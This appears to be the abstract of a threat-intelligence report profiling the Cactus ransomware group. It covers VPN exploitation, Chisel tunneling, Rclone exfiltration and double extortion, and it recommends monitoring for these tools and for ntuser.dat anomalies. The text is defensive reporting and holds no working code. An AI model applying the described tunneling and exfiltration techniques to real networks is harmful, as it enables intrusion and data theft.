Inside the Operations of Cactus: The Rise of a Stealth-Focused Ransomware Threat

This report profiles the Cactus ransomware group, a financially motivated, highly automated and stealth-focused actor observed since 2023 exploiting unpatched VPN appliances to gain direct enterprise access, using Chisel for covert tunneling and Rclone for cloud exfiltration to carry out double-extortion campaigns against large organizations (100+ confirmed victims by early 2025); it details their persistence and C2 techniques, tooling, evolution, and provides prioritized defensive recommendations (patch VPNs, enforce MFA, monitor for Chisel/Rclone and ntuser.dat anomalies, harden remote management, and segment networks).